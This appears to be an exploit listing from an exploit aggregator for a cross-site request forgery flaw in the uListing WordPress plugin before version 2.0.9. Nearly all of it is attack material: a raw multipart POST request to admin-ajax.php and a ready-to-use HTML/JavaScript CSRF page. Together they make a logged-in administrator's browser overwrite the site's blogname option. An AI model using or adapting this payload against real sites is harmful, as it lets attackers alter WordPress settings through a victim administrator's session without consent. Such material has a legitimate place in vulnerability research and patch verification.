Exploit for uListing < 2.0.9 - Arbitrary Blog Option Update via CSRF

Name: Exploit for uListing < 2.0.9 - Arbitrary Blog Option Update via CSRF
Rating: 5 (338 reviews)
2021-09-06 | CVSS 0.4
## https://sploitus.com/exploit?id=WPEX-ID:FE0FEE35-4F20-4AB9-A18C-85A76A61EF09
This will update the blogname option to Hacked.

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------425604886635129992692405644198
Content-Length: 713
Connection: close
Cookie: [admin via CSRF]

-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="file"; filename="hello.txt"
Content-Type: text/plain

Hacked
-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="nonce"

dummy
-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="type"

inventory
-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="action"

uListing_import_single
-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="id"

blogname
-----------------------------425604886635129992692405644198--

CSRF:

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/example.com\/wp-admin\/admin-ajax.php", true);
        xhr.setRequestHeader("Accept", "*\/*");
        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------425604886635129992692405644198");
        xhr.withCredentials = true;
        var body = "-----------------------------425604886635129992692405644198\r\n" + 
          "Content-Disposition: form-data; name=\"file\"; filename=\"hello.txt\"\r\n" + 
          "Content-Type: text/plain\r\n" + 
          "\r\n" + 
          "Hacked\n" + 
          "\r\n" + 
          "-----------------------------425604886635129992692405644198\r\n" + 
          "Content-Disposition: form-data; name=\"nonce\"\r\n" + 
          "\r\n" + 
          "dummy\r\n" + 
          "-----------------------------425604886635129992692405644198\r\n" + 
          "Content-Disposition: form-data; name=\"type\"\r\n" + 
          "\r\n" + 
          "inventory\r\n" + 
          "-----------------------------425604886635129992692405644198\r\n" + 
          "Content-Disposition: form-data; name=\"action\"\r\n" + 
          "\r\n" + 
          "uListing_import_single\r\n" + 
          "-----------------------------425604886635129992692405644198\r\n" + 
          "Content-Disposition: form-data; name=\"id\"\r\n" + 
          "\r\n" + 
          "blogname\r\n" + 
          "-----------------------------425604886635129992692405644198--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>